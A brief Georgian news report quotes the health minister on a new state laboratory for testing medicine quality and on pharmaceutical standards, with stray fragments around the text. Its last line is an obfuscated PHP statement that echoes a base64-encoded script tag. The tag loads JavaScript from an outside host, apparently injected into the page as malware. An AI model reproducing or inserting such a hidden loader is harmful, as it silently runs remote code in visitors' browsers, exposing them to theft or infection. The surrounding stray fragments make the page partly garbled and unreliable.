celsiusi
ავერსი შნაიდერი

„გასული წლის იანვრიდან, აქტიური ქმედებები დავიწყეთ ფარმაცევტული ბაზრის კიდევ უფრო მეტი გამჭვირვალობის, ფარმაცევტულ ბაზარზე არსებული მედიკამენტების ხარისხისა და ფასების კონტროლის კუთხით. წამლის ხარისხის კონტროლის სახელმწიფო ლაბორატორია და ფარმაცევტული მიმართულებით გადადგმული ყველა ნაბიჯი მიმართულია იმისკენ, რომ ჩვენს მოქალაქეებს ჰქონდეთ ხარისხიან მედიკამენტებზე კიდევ უფრო მეტი ხელმისაწვდომობა და სახელმწიფო სულად აკონტროლებდეს ფარმაცევტულ ბაზარს ამ მიზნებისთვის“, - აღნიშნულის შესახებ ჯანდაცვის მინისტრმა განაცხადა.

ზურაბ აზარაშვილის თქმით, რომ ბოლო 20 წლის განმავლობაში, ქვეყანას არ ჰქონდა წამლის ხარისხის კონტროლის სახელმწიფო ლაბორატორია და აღნიშნული მიზნებისთვის, უწყება სამხარაულის ექსპერტიზის ბიუროს, სხვადასხვა კერძო ლაბორატორიებს, მათ შორის საზღვარგარეთაც მიმართავდა.
„ჩვენ უკვე ამაყად შეგვიძლია განვაცხადოთ, რომ დღეს ამ პროცესის ორგანიზება შეგვიძლია ჩვენს სახელმწიფო ლაბორატორიაში, აქ 30-მდე სხვადასხვა პარამეტრით მოხდება წამლის ხარისხის შემოწმება. ვფიქრობ, რომ GMP და GDP სტანდარტთან ერთად, რაც მედიკამენტების ქვეყანაში რეალიზაციისთვის, 2022 წლის იანვრიდან სავალდებულოა, ეს არის ერთ-ერთი დამაგვირგვინებელი რგოლი“, - განაცხადა ჯანდაცვის მინისტრმა.

246
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");